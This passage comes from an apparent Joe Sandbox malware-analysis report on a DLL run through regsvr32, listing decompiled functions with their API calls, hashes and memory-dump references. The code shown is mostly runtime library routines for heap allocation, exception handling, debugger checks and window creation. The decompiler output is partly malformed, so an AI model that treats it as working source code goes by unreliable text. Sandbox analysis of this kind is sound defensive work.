				_v16 = _t50;
				goto 0x14662353;
				E00007FFD7FFD14662170(_t50, _a8);
				_v16 =  *_t50;
				E00007FFD7FFD14661910(1,  *_t50, _a8, _v16);
				goto 0x1466237a;
				if (_a16 != 0) goto 0x1466237a;
				E00007FFD7FFD146623A0( *_t50, _a8, _a16);
				if (_a16 <= 0) goto 0x1466238c;
				_v24 = 1;
				goto 0x14662394;
				_v24 = 0;
				return _v24 & 0x000000ff;
			}

APIs

Part of subcall function 00007FFD14662830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466283E
Part of subcall function 00007FFD14662830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFD1466284B

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD146622D9

Part of subcall function 00007FFD14662170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466217E

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
String ID:
API String ID: 1903167320-0
Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction ID: f4edab57ad5de398ef0ae594587d3a5ff44e318206d5e328b6dc59867ce1643b
Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction Fuzzy Hash: 7D21BF3260CE4181FB10AB25E4A03AEA770FBC77B8F500435E78D57669CF2DD5508B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1467060C Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FFD7FFD1467060C(void* __ecx, intOrPtr* __rax, long long __rbx, long long __rdi, long long __rsi, long long _a8, long long _a16, long long _a24) {

				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				if (__ecx - 0x2000 < 0) goto 0x14670654;
				E00007FFD7FFD1466B420(__rax);
				 *__rax = 9;
				E00007FFD7FFD14669744();
				return 9;
			}

0x7ffd1467060c
0x7ffd14670611
0x7ffd14670616
0x7ffd14670629
0x7ffd1467062b
0x7ffd14670635
0x7ffd14670637
0x7ffd14670653

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFD14670637

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
Instruction ID: 5c0fa209ba39e5f84c90f479cc8b4f90c8fa75959001783f587d91713ba8575a
Opcode Fuzzy Hash: 9630306cbb1685fa6066e691d321c691ce288c67f2e3b59aeca8e9753d6d96fe
Instruction Fuzzy Hash: A41182B5B18E5282F3149B34E4F04F963A0EB87768F154135E69D5B796DF7CE8108B10

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466AAD0 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466AAD0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x1466aaef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x1466ab32;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x1466ab16;
				if (E00007FFD7FFD1466E958() == 0) goto 0x1466ab32;
				if (E00007FFD7FFD146697EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x1466ab32;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x1466ab01;
				goto 0x1466ab3f;
				E00007FFD7FFD1466B420(_t22);
				 *_t22 = 0xc;
				return 0;
			}

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FFD1466BAAE,?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000), ref: 00007FFD1466AB25

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction ID: 0f63a93ab0f9b916c3c5f96579245d6a2807744cbee452175d5ce92fcea3ad6b
Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction Fuzzy Hash: D4F01D54B1AA4782FE585B7299F12F9128A5F57B7CF4C5435CD4E863D1ED2CEC818210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466AA18 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466AA18(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0x1466aa63;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x1466aa4a;
				if (E00007FFD7FFD1466E958() == 0) goto 0x1466aa63;
				if (E00007FFD7FFD146697EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x1466aa63;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x1466aa35;
				goto 0x1466aa70;
				E00007FFD7FFD1466B420(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ffd1466aa25
0x7ffd1466aa2f
0x7ffd1466aa33
0x7ffd1466aa3c
0x7ffd1466aa48
0x7ffd1466aa56
0x7ffd1466aa5f
0x7ffd1466aa61
0x7ffd1466aa63
0x7ffd1466aa68
0x7ffd1466aa75

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FFD1467040D,?,?,00000000,00007FFD1466D8B7,?,?,?,00007FFD1466A427,?,?,?,00007FFD1466A31D), ref: 00007FFD1466AA56

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction ID: 0919a4bd325a9d9c36c0cb9ea1be424d35503695282e4fe38d07b0d5b3edbac3
Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction Fuzzy Hash: 0BF05811F1DA0388FE645A739AF12F952808F47BB8F081231DC6E863C5DE6CA4414620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661B10 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFD7FFD14661B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _t7;
				void* _t8;

				_t8 = __rax;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD146611A0(_a16);
				_t7 = E00007FFD7FFD14661B40(_t8, _a8, _a16, _t8); // executed
				return _t7;
			}

0x7ffd14661b10
0x7ffd14661b10
0x7ffd14661b15
0x7ffd14661b23
0x7ffd14661b35
0x7ffd14661b3e

APIs

char_traits.LIBCPMTD ref: 00007FFD14661B23

Part of subcall function 00007FFD14661B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661B6E

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
String ID:
API String ID: 1444011685-0
Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction ID: 313b3b934088fa191ac9fc6bf6cd1d6570ff15caf584aa7725fdbe470364feaa
Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction Fuzzy Hash: 4BD09E66A29A81C1D544EB22F89109AA764EBD67D4F405435FA8E82B2ADE28C1554B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD14669474 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD14669474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0x146de008; // 0x9aee6e3408a0
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0x146694b3;
				E00007FFD7FFD1466493C(_t36);
				r8d = 0x98;
				E00007FFD7FFD14666920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00007FFD7FFD14666920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0x14669546;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0x146695a8;
				if (_t40 != 0) goto 0x146695a8;
				if (_t45 == 0xffffffff) goto 0x146695a8;
				return E00007FFD7FFD14663A70(E00007FFD7FFD1466493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
			}

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFD146694ED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD14669505
RtlVirtualUnwind.KERNEL32 ref: 00007FFD14669540
IsDebuggerPresent.KERNEL32 ref: 00007FFD14669579
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD14669583
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD1466958E

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction ID: a965514090ac579cab5c7f66c89681dabe9b2c67780a36c058a3f58f541c865e
Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction Fuzzy Hash: 8D315E36718F8186E760CF35E8902EE77A4FB86768F500136EA8D43B55DF38D5558B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14663240 Relevance: 55.8, APIs: 37, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 49%

			E00007FFD7FFD14663240(void* __edx, void* __eflags, long long __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, intOrPtr _a40, long long _a48) {
				long long _v16;
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				long long _v96;
				long long _v104;
				long long _v112;
				long long _v120;
				long long _v128;
				long long _v136;
				long long _t207;
				intOrPtr* _t209;
				intOrPtr _t218;
				intOrPtr _t221;
				long long _t223;
				void* _t225;
				intOrPtr _t228;
				long long _t229;
				void* _t230;
				intOrPtr _t235;
				long long _t237;
				void* _t239;
				void* _t243;
				long long _t245;
				void* _t247;
				long long _t248;
				void* _t249;
				long long _t250;
				void* _t251;
				long long _t257;

				_t207 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD146621F0(__eflags, __rax, _a8, _a16);
				E00007FFD7FFD146621F0(__eflags, __rax, _a32, _a40);
				E00007FFD7FFD14662400(__eflags, __rax, _a8, _a16, _a24);
				_a24 = _t207;
				E00007FFD7FFD14662400(__eflags, _t207, _a32, _a40, _a48);
				_a48 = _t207;
				_t209 = 0xffffffff - _a48;
				_v120 = 0xffffffff;
				E00007FFD7FFD14662170(_t209, _a8);
				_t211 =  *_t209 - _a24;
				if (_v120 - 0xffffffff > 0) goto 0x14663315;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170( *_t209 - _a24, _a8);
				_v136 = 0xffffffff;
				E00007FFD7FFD14662170( *_t211 - _a24 - _a16, _a8);
				_v128 = 0xffffffff;
				E00007FFD7FFD14662170( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8);
				if ( *0xffffffff - _v128 >= 0) goto 0x1466338e;
				r8d = 0;
				E00007FFD7FFD146622B0( *((intOrPtr*)( *_t211 - _a24 - _a16)) + _a48 - _a24, _a8, _v128);
				_t218 = _a24;
				if (_a48 != _t218) goto 0x146633ec;
				E00007FFD7FFD146618D0(_t218, _a32);
				_v112 = _t218 + _a40;
				E00007FFD7FFD146618F0(_t218 + _a40, _a8);
				E00007FFD7FFD14661230(_t218 + _a40 + _a16, _v112, _a48);
				goto 0x14663810;
				_t221 = _a32;
				if (_a8 == _t221) goto 0x146634a2;
				E00007FFD7FFD146618F0(_t221, _a8);
				_t223 = _t221 + _a16 + _a24;
				_v104 = _t223;
				E00007FFD7FFD146618F0(_t223, _a8);
				_t225 = _t223 + _a16 + _a48;
				E00007FFD7FFD14661230(_t225, _v104, _v136);
				E00007FFD7FFD146618D0(_t225, _a32);
				_v96 = _t225 + _a40;
				E00007FFD7FFD146618F0(_t225 + _a40, _a8);
				E00007FFD7FFD146611E0(_t225 + _a40 + _a16, _v96, _a48);
				goto 0x14663810;
				_t228 = _a24;
				if (_a48 - _t228 >= 0) goto 0x14663558;
				E00007FFD7FFD146618F0(_t228, _a8);
				_t229 = _t228 + _a40;
				_v88 = _t229;
				E00007FFD7FFD146618F0(_t229, _a8);
				_t230 = _t229 + _a16;
				E00007FFD7FFD14661230(_t230, _v88, _a48);
				E00007FFD7FFD146618F0(_t230, _a8);
				_v80 = _t230 + _a16 + _a24;
				E00007FFD7FFD146618F0(_t230 + _a16 + _a24, _a8);
				E00007FFD7FFD14661230(_t230 + _a16 + _a24 + _a16 + _a48, _v80, _v136);
				goto 0x14663810;
				_t235 = _a16;
				if (_a40 - _t235 > 0) goto 0x1466360e;
				E00007FFD7FFD146618F0(_t235, _a8);
				_t237 = _t235 + _a16 + _a24;
				_v72 = _t237;
				E00007FFD7FFD146618F0(_t237, _a8);
				_t239 = _t237 + _a16 + _a48;
				E00007FFD7FFD14661230(_t239, _v72, _v136);
				E00007FFD7FFD146618F0(_t239, _a8);
				_v64 = _t239 + _a40;
				E00007FFD7FFD146618F0(_t239 + _a40, _a8);
				E00007FFD7FFD14661230(_t239 + _a40 + _a16, _v64, _a48);
				goto 0x14663810;
				_t243 = _a16 + _a24;
				if (_t243 - _a40 > 0) goto 0x146636eb;
				E00007FFD7FFD146618F0(_t243, _a8);
				_t245 = _t243 + _a16 + _a24;
				_v56 = _t245;
				E00007FFD7FFD146618F0(_t245, _a8);
				_t247 = _t245 + _a16 + _a48;
				E00007FFD7FFD14661230(_t247, _v56, _v136);
				E00007FFD7FFD146618F0(_t247, _a8);
				_t248 = _t247 + _a40 + _a48 - _a24;
				_v48 = _t248;
				E00007FFD7FFD146618F0(_t248, _a8);
				_t249 = _t248 + _a16;
				E00007FFD7FFD14661230(_t249, _v48, _a48);
				goto 0x14663810;
				E00007FFD7FFD146618F0(_t249, _a8);
				_t250 = _t249 + _a40;
				_v40 = _t250;
				E00007FFD7FFD146618F0(_t250, _a8);
				_t251 = _t250 + _a16;
				E00007FFD7FFD14661230(_t251, _v40, _a24);
				E00007FFD7FFD146618F0(_t251, _a8);
				_v32 = _t251 + _a16 + _a24;
				E00007FFD7FFD146618F0(_t251 + _a16 + _a24, _a8);
				E00007FFD7FFD14661230(_t251 + _a16 + _a24 + _a16 + _a48, _v32, _v136);
				_t257 = _a48 - _a24;
				_v24 = _t257;
				E00007FFD7FFD146618F0(_t257, _a8);
				_t259 = _t257 + _a40 + _a48;
				_v16 = _t257 + _a40 + _a48;
				E00007FFD7FFD146618F0(_t257 + _a40 + _a48, _a8);
				E00007FFD7FFD14661230(_t259 + _a16 + _a24, _v16, _v24);
				return E00007FFD7FFD146623A0(_t259 + _a16 + _a24, _a8, _v128);
			}

APIs

Part of subcall function 00007FFD146621F0: _Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14662217

Part of subcall function 00007FFD14662170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466217E

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD14663310
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633A8
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146633C2
char_traits.LIBCPMTD ref: 00007FFD146633E2
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466342C
char_traits.LIBCPMTD ref: 00007FFD14663451
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466345E

Part of subcall function 00007FFD146618D0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618DE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663478
char_traits.LIBCPMTD ref: 00007FFD14663498
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD1466340A

Part of subcall function 00007FFD146618F0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146618FE

Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146634C0
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD146634DA
char_traits.LIBCPMTD ref: 00007FFD146634FA
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663507
Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14663529
char_traits.LIBCPMTD ref: 00007FFD1466354E

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Concurrency::details::Work$Base::ContextIdentityQueue$char_traits$EmptyQueue::Structured$Mtx_guardMtx_guard::~_
String ID:
API String ID: 1550686663-0
Opcode ID: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
Instruction ID: 179ad746e9fdd0e850bc82f18c31f2a576f62202d82542dba8397926b1657455
Opcode Fuzzy Hash: 6fddd8db350bc00e0fa7d7ec8e822f1350b5388c6aacc03662ae6e3237efefb8
Instruction Fuzzy Hash: CBD1CB66A1DFC185EA70DB55F4A13EBB361FBCA7A4F004026DA8D83B5ADF2CD4418B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14673CB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97registrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFD14673D39
RegisterTouchWindow.USER32 ref: 00007FFD14673D5A
MessageBoxW.USER32 ref: 00007FFD14673D7A

Strings

Error, xrefs: 00007FFD14673D67
Cannot register application window for multi-touch input, xrefs: 00007FFD14673D6E

Memory Dump Source

Source File: 00000003.00000002.262745344.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000003.00000002.262709179.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263282750.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263441936.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263451887.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263459521.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.263524939.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ffd14660000_regsvr32.jbxd

Similarity

API ID: Window$CreateMessageRegisterTouch
String ID: Cannot register application window for multi-touch input$Error
API String ID: 490141109-480840240
Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction ID: 74d01bd82468a8faa9eb556a2d3356b4055432ba8d7991d7c967290f76cdee3a
Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction Fuzzy Hash: ED51F471B08F4686F750DB25E8A43AA73A0FB877A8F504536D98E867A4DF7CE084C740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14662FC0 Relevance: 15.1, APIs: 10, Instructions: 117
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E00007FFD7FFD14662FC0(void* __edx, void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long _a40) {
				long long _v24;
				long long _v32;
				long long _v40;
				long long _v48;
				long long _v56;
				long long _v64;
				long long _v72;
				long long _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				long long _t108;
				long long _t110;
				intOrPtr* _t112;
				intOrPtr _t116;
				long long _t118;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if ((E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff) == 0) goto 0x1466303c;
				E00007FFD7FFD146618F0(__rax, _a8);
				_t100 = _a32 - __rax;
				_v64 = _a40;
				_v72 = _t100;
				E00007FFD7FFD14663240(__edx, E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24, _a8);
				goto 0x14663214;
				E00007FFD7FFD146621F0(E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16);
				E00007FFD7FFD14662400(E00007FFD7FFD14662250(__rax, _a8, _a32) & 0x000000ff, _t100, _a8, _a16, _a24);
				_a24 = _t100;
				_t102 = 0xffffffff - _a40;
				_v40 = 0xffffffff;
				E00007FFD7FFD14662170(_t102, _a8);
				_t104 =  *_t102 - _a24;
				if (_v40 - 0xffffffff > 0) goto 0x146630aa;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662170(_t104, _a8);
				_v56 =  *_t104 - _a24 - _a16;
				_t108 = _a24;
				if (_a40 - _t108 >= 0) goto 0x14663126;
				E00007FFD7FFD146618F0(_t108, _a8);
				_t110 = _t108 + _a16 + _a24;
				_v32 = _t110;
				E00007FFD7FFD146618F0(_t110, _a8);
				_t112 = _t110 + _a16 + _a40;
				E00007FFD7FFD14661230(_t112, _v32, _v56);
				E00007FFD7FFD14662170(_t112, _a8);
				_v48 =  *_t112 + _a40 - _a24;
				if (_a40 > 0) goto 0x14663162;
